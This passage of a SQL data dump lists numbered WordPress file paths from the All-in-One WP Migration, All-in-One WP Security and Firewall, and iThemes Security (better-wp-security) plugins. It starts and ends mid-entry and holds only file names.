hp'),(1005,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/database/class-ai1wm-database-mysql.php'),(1006,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/database/class-ai1wm-database-mysqli.php'),(1007,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/database/class-ai1wm-database-utility.php'),(1008,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/database/class-ai1wm-database.php'),(1009,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filesystem/class-ai1wm-directory.php'),(1010,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filesystem/class-ai1wm-file-htaccess.php'),(1011,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filesystem/class-ai1wm-file-index.php'),(1012,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filesystem/class-ai1wm-file-webconfig.php'),(1013,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filesystem/class-ai1wm-file.php'),(1014,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filter/class-ai1wm-recursive-exclude-filter.php'),(1015,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/filter/class-ai1wm-recursive-extension-filter.php'),(1016,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/iterator/class-ai1wm-recursive-directory-iterator.php'),(1017,'wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/iterator/class-ai1wm-recursive-iterator-iterator.php'),(1018,'wp-content/plugins/all-in-one-wp-migration/lib/view/assets/font/servmask.svg'),(1019,'wp-content/plugins/all-in-one-wp-migration/lib/view/assets/img/logo.svg'),(1020,'wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js'),(1021,'wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/export.min.js'),(1022,'wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/feedback.min.js'),(1023,'wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/import.min.js'),(1024,'wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/report.min.js'),(1025,'wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/settings.min.js'),(1026,'wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/updater.min.js'),(1027,'wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/util.min.js'),(1028,'wp-content/plugins/all-in-one-wp-migration/lib/view/backups/index.php'),(1029,'wp-content/plugins/all-in-one-wp-migration/lib/view/common/http-authentication.php'),(1030,'wp-content/plugins/all-in-one-wp-migration/lib/view/common/leave-feedback.php'),(1031,'wp-content/plugins/all-in-one-wp-migration/lib/view/common/maintenance-mode.php'),(1032,'wp-content/plugins/all-in-one-wp-migration/lib/view/common/report-problem.php'),(1033,'wp-content/plugins/all-in-one-wp-migration/lib/view/common/share-buttons.php'),(1034,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/advanced-settings.php'),(1035,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-azure-storage.php'),(1036,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-b2.php'),(1037,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-box.php'),(1038,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-digitalocean.php'),(1039,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-dropbox.php'),(1040,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-file.php'),(1041,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-ftp.php'),(1042,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-gcloud-storage.php'),(1043,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-gdrive.php'),(1044,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-glacier.php'),(1045,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-mega.php'),(1046,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-onedrive.php'),(1047,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-pcloud.php'),(1048,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-s3-client.php'),(1049,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-s3.php'),(1050,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-webdav.php'),(1051,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/export-buttons.php'),(1052,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/find-replace.php'),(1053,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/help-section.php'),(1054,'wp-content/plugins/all-in-one-wp-migration/lib/view/export/index.php'),(1055,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-azure-storage.php'),(1056,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-b2.php'),(1057,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-box.php'),(1058,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-digitalocean.php'),(1059,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-dropbox.php'),(1060,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-file.php'),(1061,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-ftp.php'),(1062,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-gcloud-storage.php'),(1063,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-gdrive.php'),(1064,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-glacier.php'),(1065,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-mega.php'),(1066,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-onedrive.php'),(1067,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-pcloud.php'),(1068,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-s3-client.php'),(1069,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-s3.php'),(1070,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-url.php'),(1071,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-webdav.php'),(1072,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/import-buttons.php'),(1073,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/index.php'),(1074,'wp-content/plugins/all-in-one-wp-migration/lib/view/import/pro.php'),(1075,'wp-content/plugins/all-in-one-wp-migration/lib/view/main/admin-head.php'),(1076,'wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-htaccess-notice.php'),(1077,'wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-index-notice.php'),(1078,'wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-path-notice.php'),(1079,'wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-webconfig-notice.php'),(1080,'wp-content/plugins/all-in-one-wp-migration/lib/view/main/get-support.php'),(1081,'wp-content/plugins/all-in-one-wp-migration/lib/view/main/multisite-notice.php'),(1082,'wp-content/plugins/all-in-one-wp-migration/lib/view/main/storage-index-notice.php'),(1083,'wp-content/plugins/all-in-one-wp-migration/lib/view/main/storage-path-notice.php'),(1084,'wp-content/plugins/all-in-one-wp-migration/lib/view/main/wordpress-htaccess-notice.php'),(1085,'wp-content/plugins/all-in-one-wp-migration/lib/view/updater/check.php'),(1086,'wp-content/plugins/all-in-one-wp-migration/lib/view/updater/modal.php'),(1087,'wp-content/plugins/all-in-one-wp-migration/loader.php'),(1088,'wp-content/plugins/all-in-one-wp-migration/storage/index.php'),(1089,'wp-content/plugins/all-in-one-wp-migration/uninstall.php'),(1090,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/general/wp-security-list-table.php'),(1091,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html'),(1092,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php'),(1093,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php'),(1094,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php'),(1095,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php'),(1096,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-brute-force-menu.php'),(1097,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-dashboard-menu.php'),(1098,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php'),(1099,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php'),(1100,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php'),(1101,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php'),(1102,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-404.php'),(1103,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-acct-activity.php'),(1104,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php'),(1105,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php'),(1106,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-logged-in-users.php'),(1107,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php'),(1108,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php'),(1109,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php'),(1110,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php'),(1111,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php'),(1112,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php'),(1113,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php'),(1114,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php'),(1115,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-login-menu.php'),(1116,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-registration-menu.php'),(1117,'wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html'),(1118,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php'),(1119,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php'),(1120,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html'),(1121,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php'),(1122,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-backup.php'),(1123,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php'),(1124,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php'),(1125,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php'),(1126,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php'),(1127,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php'),(1128,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php'),(1129,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php'),(1130,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php'),(1131,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php'),(1132,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php'),(1133,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-installer.php'),(1134,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php'),(1135,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-login.php'),(1136,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php'),(1137,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-file.php'),(1138,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php'),(1139,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php'),(1140,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php'),(1141,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php'),(1142,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-loaded-tasks.php'),(1143,'wp-content/plugins/all-in-one-wp-security-and-firewall/css/index.html'),(1144,'wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-admin-styles.css'),(1145,'wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-site-lockout-page.css'),(1146,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/arrow.png'),(1147,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/error.png'),(1148,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-difficulty-badge-bg.png'),(1149,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-points-badge-bg.png'),(1150,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/form_bg.png'),(1151,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html'),(1152,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/info-icon.png'),(1153,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif'),(1154,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon.png'),(1155,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon2.png'),(1156,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-info-icon-36.png'),(1157,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-security-icon-36.png'),(1158,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/success.png'),(1159,'wp-content/plugins/all-in-one-wp-security-and-firewall/index.html'),(1160,'wp-content/plugins/all-in-one-wp-security-and-firewall/js/index.html'),(1161,'wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js'),(1162,'wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js'),(1163,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-de_DE.mo'),(1164,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-de_DE.po'),(1165,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-fr_FR.mo'),(1166,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-fr_FR.po'),(1167,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-hu_HU.mo'),(1168,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-hu_HU.po'),(1169,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-nl_NL.mo'),(1170,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-nl_NL.po'),(1171,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pt_BR.mo'),(1172,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-pt_BR.po'),(1173,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ru_RU.mo'),(1174,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ru_RU.po'),(1175,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-sv_SE.mo'),(1176,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-sv_SE.po'),(1177,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-zh_CN.mo'),(1178,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-zh_CN.po'),(1179,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall.pot'),(1180,'wp-content/plugins/all-in-one-wp-security-and-firewall/languages/index.html'),(1181,'wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html'),(1182,'wp-content/plugins/all-in-one-wp-security-and-firewall/license.txt'),(1183,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/.htaccess'),(1184,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/index.html'),(1185,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log-cron-job.txt'),(1186,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log.txt'),(1187,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html'),(1188,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php'),(1189,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php'),(1190,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php'),(1191,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php'),(1192,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php'),(1193,'wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt'),(1194,'wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php'),(1195,'wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php'),(1196,'wp-content/plugins/better-wp-security/better-wp-security.php'),(1197,'wp-content/plugins/better-wp-security/core/admin-pages/css/index.php'),(1198,'wp-content/plugins/better-wp-security/core/admin-pages/css/style.css'),(1199,'wp-content/plugins/better-wp-security/core/admin-pages/index.php'),(1200,'wp-content/plugins/better-wp-security/core/admin-pages/init.php'),(1201,'wp-content/plugins/better-wp-security/core/admin-pages/js/debug.js'),(1202,'wp-content/plugins/better-wp-security/core/admin-pages/js/index.php'),(1203,'wp-content/plugins/better-wp-security/core/admin-pages/js/logs.js'),(1204,'wp-content/plugins/better-wp-security/core/admin-pages/js/script.js'),(1205,'wp-content/plugins/better-wp-security/core/admin-pages/js/settings.js'),(1206,'wp-content/plugins/better-wp-security/core/admin-pages/js/util.js'),(1207,'wp-content/plugins/better-wp-security/core/admin-pages/logs-list-table.php'),(1208,'wp-content/plugins/better-wp-security/core/admin-pages/module-settings.php'),(1209,'wp-content/plugins/better-wp-security/core/admin-pages/page-debug.php'),(1210,'wp-content/plugins/better-wp-security/core/admin-pages/page-go-pro.php'),(1211,'wp-content/plugins/better-wp-security/core/admin-pages/page-logs.php'),(1212,'wp-content/plugins/better-wp-security/core/admin-pages/page-security-check.php'),(1213,'wp-content/plugins/better-wp-security/core/admin-pages/page-settings.php'),(1214,'wp-content/plugins/better-wp-security/core/admin-pages/sidebar-widget.php'),(1215,'wp-content/plugins/better-wp-security/core/core.php'),(1216,'wp-content/plugins/better-wp-security/core/css/index.php'),(1217,'wp-content/plugins/better-wp-security/core/css/ithemes.css'),(1218,'wp-content/plugins/better-wp-security/core/css/itsec_notice.css'),(1219,'wp-content/plugins/better-wp-security/core/files.php'),(1220,'wp-content/plugins/better-wp-security/core/history.txt'),(1221,'wp-content/plugins/better-wp-security/core/img/alert16.png'),(1222,'wp-content/plugins/better-wp-security/core/img/bb-ad.jpg'),(1223,'wp-content/plugins/better-wp-security/core/img/check16.png'),(1224,'wp-content/plugins/better-wp-security/core/img/flag16-blue.png'),(1225,'wp-content/plugins/better-wp-security/core/img/flag16-red.png'),(1226,'wp-content/plugins/better-wp-security/core/img/flag16-yellow.png'),(1227,'wp-content/plugins/better-wp-security/core/img/green-check16.png'),(1228,'wp-content/plugins/better-wp-security/core/img/index.php'),(1229,'wp-content/plugins/better-wp-security/core/img/mail/article_icon.png'),(1230,'wp-content/plugins/better-wp-security/core/img/mail/attachment_icon.png'),(1231,'wp-content/plugins/better-wp-security/core/img/mail/documentation_icon.png'),(1232,'wp-content/plugins/better-wp-security/core/img/mail/footer_logo.png'),(1233,'wp-content/plugins/better-wp-security/core/img/mail/icon_folder.png'),(1234,'wp-content/plugins/better-wp-security/core/img/mail/icon_lock.png'),(1235,'wp-content/plugins/better-wp-security/core/img/mail/icon_message.png'),(1236,'wp-content/plugins/better-wp-security/core/img/mail/index.php'),(1237,'wp-content/plugins/better-wp-security/core/img/mail/info_icon.png'),(1238,'wp-content/plugins/better-wp-security/core/img/mail/logo.png'),(1239,'wp-content/plugins/better-wp-security/core/img/mail/pro_logo.png'),(1240,'wp-content/plugins/better-wp-security/core/img/mail/pro_logo_no_text.png'),(1241,'wp-content/plugins/better-wp-security/core/img/mail/support_icon.png'),(1242,'wp-content/plugins/better-wp-security/core/img/mail/video_icon.png'),(1243,'wp-content/plugins/better-wp-security/core/img/mail/warning_icon_yellow.png'),(1244,'wp-content/plugins/better-wp-security/core/img/mail/wp_security_book.png'),(1245,'wp-content/plugins/better-wp-security/core/img/return-to-top.png'),(1246,'wp-content/plugins/better-wp-security/core/index.php'),(1247,'wp-content/plugins/better-wp-security/core/js/admin-dashboard-footer.js'),(1248,'wp-content/plugins/better-wp-security/core/js/admin-dashboard.js'),(1249,'wp-content/plugins/better-wp-security/core/js/admin-global-settings.js'),(1250,'wp-content/plugins/better-wp-security/core/js/admin-logs.js'),(1251,'wp-content/plugins/better-wp-security/core/js/admin-modal.js'),(1252,'wp-content/plugins/better-wp-security/core/js/index.php'),(1253,'wp-content/plugins/better-wp-security/core/js/itsec-notice.js'),(1254,'wp-content/plugins/better-wp-security/core/js/scrollTo.js'),(1255,'wp-content/plugins/better-wp-security/core/js/tracking.js'),(1256,'wp-content/plugins/better-wp-security/core/lib/admin-notices/actions/class-itsec-admin-notice-action-callback.php'),(1257,'wp-content/plugins/better-wp-security/core/lib/admin-notices/actions/class-itsec-admin-notice-action-link.php'),(1258,'wp-content/plugins/better-wp-security/core/lib/admin-notices/actions/index.php'),(1259,'wp-content/plugins/better-wp-security/core/lib/admin-notices/actions/interface-itsec-admin-notice-action.php'),(1260,'wp-content/plugins/better-wp-security/core/lib/admin-notices/class-itsec-admin-notice-callback.php'),(1261,'wp-content/plugins/better-wp-security/core/lib/admin-notices/class-itsec-admin-notice-context.php'),(1262,'wp-content/plugins/better-wp-security/core/lib/admin-notices/class-itsec-admin-notice-globally-dismissible.php'),(1263,'wp-content/plugins/better-wp-security/core/lib/admin-notices/class-itsec-admin-notice-highlighted-log.php'),(1264,'wp-content/plugins/better-wp-security/core/lib/admin-notices/class-itsec-admin-notice-managers-only.php'),(1265,'wp-content/plugins/better-wp-security/core/lib/admin-notices/class-itsec-admin-notice-remind-me.php'),(1266,'wp-content/plugins/better-wp-security/core/lib/admin-notices/class-itsec-admin-notice-screen-blacklist.php'),(1267,'wp-content/plugins/better-wp-security/core/lib/admin-notices/class-itsec-admin-notice-static.php'),(1268,'wp-content/plugins/better-wp-security/core/lib/admin-notices/class-itsec-admin-notice-user-dismissible.php'),(1269,'wp-content/plugins/better-wp-security/core/lib/admin-notices/index.php'),(1270,'wp-content/plugins/better-wp-security/core/lib/admin-notices/interface-itsec-admin-notice.php'),(1271,'wp-content/plugins/better-wp-security/core/lib/class-itsec-job.php'),(1272,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-admin-notices.php'),(1273,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-browser.php'),(1274,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-canonical-roles.php'),(1275,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-config-file.php'),(1276,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-directory.php'),(1277,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-distributed-storage.php'),(1278,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-feature-flags.php'),(1279,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-file.php'),(1280,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-fingerprinting.php'),(1281,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-geolocation.php'),(1282,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-highlighted-logs.php'),(1283,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-ip-tools.php'),(1284,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-login-interstitial.php'),(1285,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-password-requirements.php'),(1286,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-remote-messages.php'),(1287,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-static-map-api.php'),(1288,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-user-activity.php'),(1289,'wp-content/plugins/better-wp-security/core/lib/class-itsec-lib-utility.php'),(1290,'wp-content/plugins/better-wp-security/core/lib/class-itsec-mail.php'),(1291,'wp-content/plugins/better-wp-security/core/lib/class-itsec-scheduler-cron.php'),(1292,'wp-content/plugins/better-wp-security/core/lib/class-itsec-scheduler-page-load.php'),(1293,'wp-content/plugins/better-wp-security/core/lib/class-itsec-scheduler.php'),(1294,'wp-content/plugins/better-wp-security/core/lib/class-itsec-wp-list-table.php'),(1295,'wp-content/plugins/better-wp-security/core/lib/debug.php'),(1296,'wp-content/plugins/better-wp-security/core/lib/fingerprinting/class-itsec-fingerprint-comparison.php'),(1297,'wp-content/plugins/better-wp-security/core/lib/fingerprinting/class-itsec-fingerprint-value.php'),(1298,'wp-content/plugins/better-wp-security/core/lib/fingerprinting/class-itsec-fingerprint.php'),(1299,'wp-content/plugins/better-wp-security/core/lib/fingerprinting/index.php'),(1300,'wp-content/plugins/better-wp-security/core/lib/fingerprinting/interface-itsec-fingerprint-source.php'),(1301,'wp-content/plugins/better-wp-security/core/lib/form.php'),(1302,'wp-content/plugins/better-wp-security/core/lib/geolocation/class-itsec-geolocator-chain.php'),(1303,'wp-content/plugins/better-wp-security/core/lib/geolocation/class-itsec-geolocator-page-cache.php'),(1304,'wp-content/plugins/better-wp-security/core/lib/geolocation/index.php'),(1305,'wp-content/plugins/better-wp-security/core/lib/geolocation/interface-itsec-geolocator.php'),(1306,'wp-content/plugins/better-wp-security/core/lib/includes/function.login-header.php'),(1307,'wp-content/plugins/better-wp-security/core/lib/includes/index.php'),(1308,'wp-content/plugins/better-wp-security/core/lib/index.php'),(1309,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/index.php'),(1310,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matcher.php'),(1311,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/adjacency_graphs.json'),(1312,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/bruteforce.php'),(1313,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/date.php'),(1314,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/dictionary-l33t.php'),(1315,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/dictionary-reverse.php'),(1316,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/dictionary.php'),(1317,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/index.php'),(1318,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/ranked_frequency_list-english_wikipedia.json'),(1319,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/ranked_frequency_list-female_names.json'),(1320,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/ranked_frequency_list-male_names.json'),(1321,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/ranked_frequency_list-passwords.json'),(1322,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/ranked_frequency_list-surnames.json'),(1323,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/ranked_frequency_list-us_tv_and_film.json'),(1324,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/regex.php'),(1325,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/repeat.php'),(1326,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/sequence.php'),(1327,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/matchers/spatial.php'),(1328,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/readme.md'),(1329,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/results.php'),(1330,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/scorer.php'),(1331,'wp-content/plugins/better-wp-security/core/lib/itsec-zxcvbn-php/zxcvbn.php'),(1332,'wp-content/plugins/better-wp-security/core/lib/lock.php'),(1333,'wp-content/plugins/better-wp-security/core/lib/log-util.php'),(1334,'wp-content/plugins/better-wp-security/core/lib/log.php'),(1335,'wp-content/plugins/better-wp-security/core/lib/login-interstitial/abstract-itsec-login-interstitial.php'),(1336,'wp-content/plugins/better-wp-security/core/lib/login-interstitial/class-itsec-login-interstitial-config-driven.php'),(1337,'wp-content/plugins/better-wp-security/core/lib/login-interstitial/class-itsec-login-interstitial-session.php'),(1338,'wp-content/plugins/better-wp-security/core/lib/login-interstitial/index.php'),(1339,'wp-content/plugins/better-wp-security/core/lib/login-interstitial/util.js'),(1340,'wp-content/plugins/better-wp-security/core/lib/mail-templates/close.html'),(1341,'wp-content/pl